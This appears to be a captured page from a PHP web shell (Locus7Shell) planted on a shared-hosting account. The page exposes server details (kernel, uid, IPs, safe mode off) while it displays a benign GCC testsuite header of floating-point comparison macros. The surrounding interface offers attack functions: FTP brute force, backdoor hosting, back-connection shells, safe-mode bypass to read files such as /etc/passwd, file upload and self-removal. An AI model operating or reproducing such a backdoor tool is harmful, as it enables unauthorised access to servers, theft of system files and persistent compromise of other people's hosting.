Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/s390/zvector/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     autovec.h (1.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#ifndef AUTOVEC_H
#define AUTOVEC_H 1

#define QUIET_EQ(x, y) ((x) == (y))
#define QUIET_GE __builtin_isgreaterequal
#define QUIET_GT __builtin_isgreater
#define QUIET_LE __builtin_islessequal
#define QUIET_LT __builtin_isless
#define QUIET_ORDERED(x, y) (!__builtin_isunordered ((x), (y)))
#define QUIET_UNEQ(x, y) (__builtin_isless ((x), (y)) \
                          || __builtin_isgreater ((x), (y)))
#define QUIET_UNORDERED __builtin_isunordered
#define SIGNALING_EQ(x, y) (((x) <= (y)) && ((x) >= (y)))
#define SIGNALING_GE(x, y) ((x) >= (y))
#define SIGNALING_GT(x, y) ((x) > (y))
#define SIGNALING_LE(x, y) ((x) <= (y))
#define SIGNALING_LT(x, y) ((x) < (y))
#define SIGNALING_LTGT(x, y) (((x) < (y)) || ((x) > (y)))

#define AUTOVEC(RESULT_TYPE, OP_TYPE, OP) void \
f (RESULT_TYPE *r, const OP_TYPE *x, const OP_TYPE *y) \
{ \
  int i; \
\
  for (i = 0; i < 1000000; i++) \
    { \
      OP_TYPE xi = x[i], yi = y[i]; \
\
      r[i] = OP (xi, yi); \
    } \
}

#define AUTOVEC_DOUBLE(OP) AUTOVEC (long long, double, OP)

#define AUTOVEC_FLOAT(OP) AUTOVEC (int, float, OP)

#ifdef __SIZEOF_INT128__
typedef __int128 v1ti __attribute__ ((vector_size (16)));
typedef long double v1tf __attribute__ ((vector_size (16)));
#define AUTOVEC_LONG_DOUBLE(OP) AUTOVEC (v1ti, v1tf, OP)
#endif

#endif

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0072 ]--